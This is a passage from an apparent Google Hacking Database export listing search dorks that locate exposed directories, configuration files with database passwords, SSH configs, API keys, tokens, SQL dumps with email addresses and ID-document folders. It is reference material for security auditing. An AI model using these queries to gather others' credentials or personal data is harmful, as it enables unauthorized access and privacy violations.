</entry>
<entry>
<id>7634</id>
<link>https://www.exploit-db.com/ghdb/7634</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;license&quot; &quot;upload&quot;</shortDescription>
<textualDescription># Google Dork: sindex of: &quot;license&quot; &quot;upload&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;license&quot; &quot;upload&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;license&quot; &quot;upload&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7677</id>
<link>https://www.exploit-db.com/ghdb/7677</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;marksheet&quot; &quot;upload&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;marksheet&quot; &quot;upload&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>index of: &quot;marksheet&quot; &quot;upload&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;marksheet&quot; &quot;upload&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7624</id>
<link>https://www.exploit-db.com/ghdb/7624</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;parent directory&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;parent directory&quot; &quot;uploads&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;parent directory&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;parent directory&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7652</id>
<link>https://www.exploit-db.com/ghdb/7652</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;participants&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;participants&quot; &quot;uploads&quot;
# Files Containing Juicy Info
# Date: 11/05/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;participants&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;participants&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7645</id>
<link>https://www.exploit-db.com/ghdb/7645</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;putty&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;putty&quot; &quot;uploads&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;putty&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;putty&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7630</id>
<link>https://www.exploit-db.com/ghdb/7630</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;QRcodes&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;QRcodes&quot; &quot;uploads&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;QRcodes&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;QRcodes&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>8234</id>
<link>https://www.exploit-db.com/ghdb/8234</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: /aadhar</shortDescription>
<textualDescription># Google Dork: index of: /aadhar
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit sai vijay kumar M</textualDescription>
<query>index of: /aadhar</query>
<querystring>https://www.google.com/search?q=index of: /aadhar</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>sai vijay kumar M</author>
</entry>
<entry>
<id>7985</id>
<link>https://www.exploit-db.com/ghdb/7985</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of:&quot;backtrack&quot; &quot;hack&quot; ext:php</shortDescription>
<textualDescription> Google Dork: index of:&quot;backtrack&quot; &quot;hack&quot; ext:php
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of:&quot;backtrack&quot; &quot;hack&quot; ext:php</query>
<querystring>https://www.google.com/search?q=index of:&quot;backtrack&quot; &quot;hack&quot; ext:php</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7686</id>
<link>https://www.exploit-db.com/ghdb/7686</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of:&quot;blog&quot; &quot;upload&quot;</shortDescription>
<textualDescription># Google Dork: index of:&quot;blog&quot; &quot;upload&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>index of:&quot;blog&quot; &quot;upload&quot;</query>
<querystring>https://www.google.com/search?q=index of:&quot;blog&quot; &quot;upload&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7644</id>
<link>https://www.exploit-db.com/ghdb/7644</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of:&quot;password&quot; &quot;wp-content&quot;</shortDescription>
<textualDescription># Google Dork: index of:&quot;password&quot; &quot;wp-content&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of:&quot;password&quot; &quot;wp-content&quot;</query>
<querystring>https://www.google.com/search?q=index of:&quot;password&quot; &quot;wp-content&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>8089</id>
<link>https://www.exploit-db.com/ghdb/8089</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of:admin.asp</shortDescription>
<textualDescription># Google Dork: index of:admin.asp
# Files Containing Juicy Info
# Date:27/02/2023
# Exploit Author: index of:admin.asp</textualDescription>
<query>index of:admin.asp</query>
<querystring>https://www.google.com/search?q=index of:admin.asp</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>Rhishinathvarma Marimuthu</author>
</entry>
<entry>
<id>5543</id>
<link>https://www.exploit-db.com/ghdb/5543</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index.of &quot;crossdomain.xml&quot;</shortDescription>
<textualDescription>Dork:
index.of &quot;crossdomain.xml&quot;
Author:Mayur Parmar(th3cyb3rc0p)
</textualDescription>
<query>index.of &quot;crossdomain.xml&quot;</query>
<querystring>https://www.google.com/search?q=index.of &quot;crossdomain.xml&quot;</querystring>
<edb></edb>
<date>2019-09-17</date>
<author>Mayur Parmar</author>
</entry>
<entry>
<id>6182</id>
<link>https://www.exploit-db.com/ghdb/6182</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index.of:&quot;pcap&quot; -site:stackoverflow.com -site:github.com</shortDescription>
<textualDescription>Dork:
index.of:&quot;pcap&quot; -site:stackoverflow.com -site:github.com
Description:
This dork queries google and finds the Wireshark PCAP files within open directories.
Category:
Files Containing Juicy Info.
Author:
JadeWolf</textualDescription>
<query>index.of:&quot;pcap&quot; -site:stackoverflow.com -site:github.com</query>
<querystring>https://www.google.com/search?q=index.of:&quot;pcap&quot; -site:stackoverflow.com -site:github.com</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>JadeWolf</author>
</entry>
<entry>
<id>8076</id>
<link>https://www.exploit-db.com/ghdb/8076</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Index:Index of /wp-admin</shortDescription>
<textualDescription># Google Dork: Index:Index of /wp-admin
# Files Containing Juicy Info
# Date:22/02/2023
# Exploit Author: Kayala Satya Prakash</textualDescription>
<query>Index:Index of /wp-admin</query>
<querystring>https://www.google.com/search?q=Index:Index of /wp-admin</querystring>
<edb></edb>
<date>2023-02-22</date>
<author>Kayala Satya Prakash</author>
</entry>
<entry>
<id>8099</id>
<link>https://www.exploit-db.com/ghdb/8099</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Inquiry about Search Results for intitle:&quot;index.of&quot; *S3</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index.of&quot; *S3
# Files Containing Juicy Info
# Date:07/03/2023
# Exploit Author: Ritesh Sahu</textualDescription>
<query>Inquiry about Search Results for intitle:&quot;index.of&quot; *S3</query>
<querystring>https://www.google.com/search?q=Inquiry about Search Results for intitle:&quot;index.of&quot; *S3</querystring>
<edb></edb>
<date>2023-03-07</date>
<author>Ritesh Sahu</author>
</entry>
<entry>
<id>7998</id>
<link>https://www.exploit-db.com/ghdb/7998</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext: &quot;admin&quot; &quot;subscribe&quot; filetype:php</shortDescription>
<textualDescription># Google Dork: intext: &quot;admin&quot; &quot;subscribe&quot; filetype:php
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext: &quot;admin&quot; &quot;subscribe&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=intext: &quot;admin&quot; &quot;subscribe&quot; filetype:php</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>4304</id>
<link>https://www.exploit-db.com/ghdb/4304</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;/LM/W3SVC/&quot; ext:asp</shortDescription>
<textualDescription>intext:&quot;/LM/W3SVC/&quot; ext:asp
ServerVariables that give information.
-Xploit </textualDescription>
<query>intext:&quot;/LM/W3SVC/&quot; ext:asp</query>
<querystring>https://www.google.com/search?q=intext:&quot;/LM/W3SVC/&quot; ext:asp</querystring>
<edb></edb>
<date>2016-07-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4305</id>
<link>https://www.exploit-db.com/ghdb/4305</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;/showme.asp&quot; HTTP_ACCEPT</shortDescription>
<textualDescription>intext:&quot;/showme.asp&quot; HTTP_ACCEPT
Application &amp; Session Contents for Servers.
-Xploit </textualDescription>
<query>intext:&quot;/showme.asp&quot; HTTP_ACCEPT</query>
<querystring>https://www.google.com/search?q=intext:&quot;/showme.asp&quot; HTTP_ACCEPT</querystring>
<edb></edb>
<date>2016-07-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>7914</id>
<link>https://www.exploit-db.com/ghdb/7914</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;/webdynpro/resources/sap.com/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;/webdynpro/resources/sap.com/&quot;
# Files Containing Juicy Info
# Date:16/06/2022
# Exploit Author: Leonardo Venegas</textualDescription>
<query>intext:&quot;/webdynpro/resources/sap.com/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;/webdynpro/resources/sap.com/&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Leonardo Venegas</author>
</entry>
<entry>
<id>5200</id>
<link>https://www.exploit-db.com/ghdb/5200</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;@gmail.com&quot; AND intext:&quot;@yahoo.com&quot; filetype:sql</shortDescription>
<textualDescription>Exploit : Finds SQL dump files with gmail and yahoo email account.
Google Dork : intext:&quot;@gmail.com&quot; AND intext:&quot;@yahoo.com&quot; filetype:sql
Exploit Author:- Jayson Zabate
URL :- https://invalidwebsecurity.info/
</textualDescription>
<query>intext:&quot;@gmail.com&quot; AND intext:&quot;@yahoo.com&quot; filetype:sql</query>
<querystring>https://www.google.com/search?q=intext:&quot;@gmail.com&quot; AND intext:&quot;@yahoo.com&quot; filetype:sql</querystring>
<edb></edb>
<date>2019-05-06</date>
<author>Jayson Zabate</author>
</entry>
<entry>
<id>5651</id>
<link>https://www.exploit-db.com/ghdb/5651</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;@gmail.com&quot; ext:log</shortDescription>
<textualDescription>Files containing juicy nfo:
intext:&quot;@gmail.com&quot; ext:log
Reza Abasi(Turku)
</textualDescription>
<query>intext:&quot;@gmail.com&quot; ext:log</query>
<querystring>https://www.google.com/search?q=intext:&quot;@gmail.com&quot; ext:log</querystring>
<edb></edb>
<date>2019-11-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5653</id>
<link>https://www.exploit-db.com/ghdb/5653</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;@outlook.com&quot; ext:log</shortDescription>
<textualDescription>Files containing juicy nfo:
intext:&quot;@outlook.com&quot; ext:log
intext:&quot;@hotmail.com&quot; ext:log
Author : Ismail Tasdelen
</textualDescription>
<query>intext:&quot;@outlook.com&quot; ext:log</query>
<querystring>https://www.google.com/search?q=intext:&quot;@outlook.com&quot; ext:log</querystring>
<edb></edb>
<date>2019-11-21</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>7459</id>
<link>https://www.exploit-db.com/ghdb/7459</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;adobe coldfusion 8&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;adobe coldfusion 8&quot;
# Files Containing Juicy Info
# Date:18/10/2021
# Exploit Author: Red Blue Ops</textualDescription>
<query>intext:&quot;adobe coldfusion 8&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;adobe coldfusion 8&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>7255</id>
<link>https://www.exploit-db.com/ghdb/7255</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;API KEY&quot; site:pastebin.com</shortDescription>
<textualDescription># Google Dork: intext:&quot;API KEY&quot; site:pastebin.com
# Files Containing Juicy Info
# Date: 24/07/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>intext:&quot;API KEY&quot; site:pastebin.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;API KEY&quot; site:pastebin.com</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>8206</id>
<link>https://www.exploit-db.com/ghdb/8206</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;ArcGIS REST Services Directory&quot; intitle:&quot;Folder: /&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;ArcGIS REST Services Directory&quot; intitle:&quot;Folder: /&quot;
# Files Containing Juicy Info
# Date:02/06/2023
# Exploit Author: Alonso Eduardo Caballero Quezada</textualDescription>
<query>intext:&quot;ArcGIS REST Services Directory&quot; intitle:&quot;Folder: /&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;ArcGIS REST Services Directory&quot; intitle:&quot;Folder: /&quot;</querystring>
<edb></edb>
<date>2023-06-02</date>
<author>Alonso Eduardo Caballero Quezada</author>
</entry>
<entry>
<id>4948</id>
<link>https://www.exploit-db.com/ghdb/4948</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;class JConfig {&quot; inurl:configuration.php</shortDescription>
<textualDescription>intext:&quot;class JConfig {&quot; inurl:configuration.php
This Google Dork discovers badly configured servers exposing sensitive
Joomla configuaration information.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intext:&quot;class JConfig {&quot; inurl:configuration.php</query>
<querystring>https://www.google.com/search?q=intext:&quot;class JConfig {&quot; inurl:configuration.php</querystring>
<edb></edb>
<date>2018-09-12</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>5213</id>
<link>https://www.exploit-db.com/ghdb/5213</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;config&quot; intitle:&quot;Index of .ssh&quot;</shortDescription>
<textualDescription>Description :
SSH client config files
Dork :
intext:&quot;config&quot; intitle:&quot;Index of .ssh&quot;
Author :
Vipin Joshi(@vocuzi)
</textualDescription>
<query>intext:&quot;config&quot; intitle:&quot;Index of .ssh&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;config&quot; intitle:&quot;Index of .ssh&quot;</querystring>
<edb></edb>
<date>2019-05-13</date>
<author>vocuzi</author>
</entry>
<entry>
<id>5896</id>
<link>https://www.exploit-db.com/ghdb/5896</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Current Configuration:&quot; ext:cfg -git</shortDescription>
<textualDescription># Google Dork: intext:&quot;Current Configuration:&quot; ext:cfg -git
# By using this dork, some user names and passwords in configuration files
can be found.
# Date: 7/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Current Configuration:&quot; ext:cfg -git</query>
<querystring>https://www.google.com/search?q=intext:&quot;Current Configuration:&quot; ext:cfg -git</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4947</id>
<link>https://www.exploit-db.com/ghdb/4947</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;define('DB_NAME',&quot; ext:txt</shortDescription>
<textualDescription>intext:&quot;define('DB_NAME',&quot; ext:txt
This Google Dork discovers badly configured servers exposing sensitive
Wordpress database information.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intext:&quot;define('DB_NAME',&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;define('DB_NAME',&quot; ext:txt</querystring>
<edb></edb>
<date>2018-09-12</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>7352</id>
<link>https://www.exploit-db.com/ghdb/7352</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;docs.google.com/forms/d/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;docs.google.com/forms/d/&quot;
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Rodrigo Ferreira</textualDescription>
<query>intext:&quot;docs.google.com/forms/d/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;docs.google.com/forms/d/&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Rodrigo Ferreira</author>
</entry>
<entry>
<id>4698</id>
<link>https://www.exploit-db.com/ghdb/4698</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Dr.Web (R) Anti-virus. Virus base add-on&quot; + ext:txt</shortDescription>
<textualDescription> intext:&quot;Dr.Web (R) Anti-virus. Virus base add-on&quot; + ext:txt
Dr.Web Anti-virus information
ManhNho
</textualDescription>
<query>intext:&quot;Dr.Web (R) Anti-virus. Virus base add-on&quot; + ext:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;Dr.Web (R) Anti-virus. Virus base add-on&quot; + ext:txt</querystring>
<edb></edb>
<date>2018-03-15</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5818</id>
<link>https://www.exploit-db.com/ghdb/5818</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;dspace.cfg&quot; &quot;db.username = dspace&quot;</shortDescription>
<textualDescription># Google Dork:
intext:&quot;dspace.cfg&quot; &quot;db.username = dspace&quot;
intext:&quot;dspace.cfg&quot; &quot;db.username = dspace&quot; &quot;db.password =&quot;
# By using this dork, usernames and passwords in configuration files can be
found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;dspace.cfg&quot; &quot;db.username = dspace&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;dspace.cfg&quot; &quot;db.username = dspace&quot;</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4047</id>
<link>https://www.exploit-db.com/ghdb/4047</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Full path to a .htpasswd file in this dir:&quot; filetype:php</shortDescription>
<textualDescription>Files containing Juicy information from web online tools for generating .htpasswd and giving full web path .
by - l1kw1d </textualDescription>
<query>intext:&quot;Full path to a .htpasswd file in this dir:&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;Full path to a .htpasswd file in this dir:&quot; filetype:php</querystring>
<edb></edb>
<date>2015-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6278</id>
<link>https://www.exploit-db.com/ghdb/6278</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of /&quot; &quot;*.yaml&quot;</shortDescription>
<textualDescription>Google Dork: intext:&quot;index of /&quot; &quot;*.yaml&quot;
Dork Title: Files Containing Juicy Info
Dork Author: Abinesh kamal K U
--
Abinesh Kamal K U
</textualDescription>
<query>intext:&quot;index of /&quot; &quot;*.yaml&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of /&quot; &quot;*.yaml&quot;</querystring>
<edb></edb>
<date>2020-06-15</date>
<author>Abinesh kamal K U</author>
</entry>
<entry>
<id>5762</id>
<link>https://www.exploit-db.com/ghdb/5762</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of /&quot; &quot;auth.json&quot;</shortDescription>
<textualDescription>intext:&quot;index of /&quot; &quot;auth.json&quot;
by
Sagar Banwa
</textualDescription>
<query>intext:&quot;index of /&quot; &quot;auth.json&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of /&quot; &quot;auth.json&quot;</querystring>
<edb></edb>
<date>2020-03-03</date>
<author>Sagar Banwa</author>
</entry>
<entry>
<id>6275</id>
<link>https://www.exploit-db.com/ghdb/6275</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of /&quot; &quot;config.json&quot;</shortDescription>
<textualDescription>Google Dork: intext:&quot;index of /&quot; &quot;config.json&quot;
Dork Title: Files Containing Juicy Info
Dork Author: Abinesh kamal K U
</textualDescription>
<query>intext:&quot;index of /&quot; &quot;config.json&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of /&quot; &quot;config.json&quot;</querystring>
<edb></edb>
<date>2020-06-12</date>
<author>Abinesh kamal K U</author>
</entry>
<entry>
<id>5809</id>
<link>https://www.exploit-db.com/ghdb/5809</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of /&quot; &quot;token.yml&quot;</shortDescription>
<textualDescription>Description : intext:&quot;index of /&quot; &quot;token.yml&quot;
This google dork gives us the secret tokens and access tokens of
misconfigured servers.
</textualDescription>
<query>intext:&quot;index of /&quot; &quot;token.yml&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of /&quot; &quot;token.yml&quot;</querystring>
<edb></edb>
<date>2020-03-19</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>7731</id>
<link>https://www.exploit-db.com/ghdb/7731</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of /chatlogs&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of /chatlogs&quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Kashish rohilla</textualDescription>
<query>intext:&quot;Index of /chatlogs&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of /chatlogs&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Kashish rohilla</author>
</entry>
<entry>
<id>8317</id>
<link>https://www.exploit-db.com/ghdb/8317</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of wp-content/uploads&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of wp-content/uploads&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Muhammad Abrar</textualDescription>
<query>intext:&quot;index of wp-content/uploads&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of wp-content/uploads&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Muhammad Abrar</author>
</entry>
<entry>
<id>8053</id>
<link>https://www.exploit-db.com/ghdb/8053</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;.git&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;.git&quot;
# Files Containing Juicy Info
# Date:07/02/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intext:&quot;index of&quot; &quot;.git&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;.git&quot;</querystring>
<edb></edb>
<date>2023-02-07</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>7995</id>
<link>https://www.exploit-db.com/ghdb/7995</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;.html&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;.html&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;index of&quot; &quot;.html&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;.html&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>8030</id>
<link>https://www.exploit-db.com/ghdb/8030</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;.sql&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;.sql&quot;
# Files Containing Juicy Info
# Date:19/09/2022
# Exploit Author: Gopalsamy Rajendran</textualDescription>
<query>intext:&quot;index of&quot; &quot;.sql&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;.sql&quot;</querystring>
<edb></edb>
<date>2022-09-19</date>
<author>Gopalsamy Rajendran</author>
</entry>
<entry>
<id>8065</id>
<link>https://www.exploit-db.com/ghdb/8065</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;backuop/*.sql&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;backuop/*.sql&quot;
# Files Containing Juicy Info
# Date:15/02/2023
# Exploit Author: Ahmad Kataranjee</textualDescription>
<query>intext:&quot;index of&quot; &quot;backuop/*.sql&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;backuop/*.sql&quot;</querystring>
<edb></edb>
<date>2023-02-15</date>
<author>Ahmad Kataranjee</author>
</entry>
<entry>
<id>8083</id>
<link>https://www.exploit-db.com/ghdb/8083</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;config&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;config&quot;
# Files Containing Juicy Info
# Date:24/02/2023
# Exploit Author: Muhammad Navaid Zafar Ansari</textualDescription>
<query>intext:&quot;index of&quot; &quot;config&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;config&quot;</querystring>
<edb></edb>
<date>2023-02-24</date>
<author>Muhammad Navaid Zafar Ansari</author>
</entry>
<entry>
<id>7549</id>
<link>https://www.exploit-db.com/ghdb/7549</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; &quot;email.txt&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; &quot;email.txt&quot;
# Files Containing Juicy Info
# Date:31/10/2021
# Exploit Author: Parshwa Bhavsar</textualDescription>
<query>intext:&quot;Index of&quot; &quot;email.txt&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; &quot;email.txt&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Parshwa Bhavsar</author>
</entry>
<entry>
<id>7614</id>
<link>https://www.exploit-db.com/ghdb/7614</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;ftp&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;ftp&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intext:&quot;index of&quot; &quot;ftp&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;ftp&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7666</id>
<link>https://www.exploit-db.com/ghdb/7666</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;home_page&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;home_page&quot;
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intext:&quot;index of&quot; &quot;home_page&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;home_page&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7991</id>
<link>https://www.exploit-db.com/ghdb/7991</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;httpclient&quot; &quot;login&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;httpclient&quot; &quot;login&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;index of&quot; &quot;httpclient&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;httpclient&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>8330</id>
<link>https://www.exploit-db.com/ghdb/8330</link>
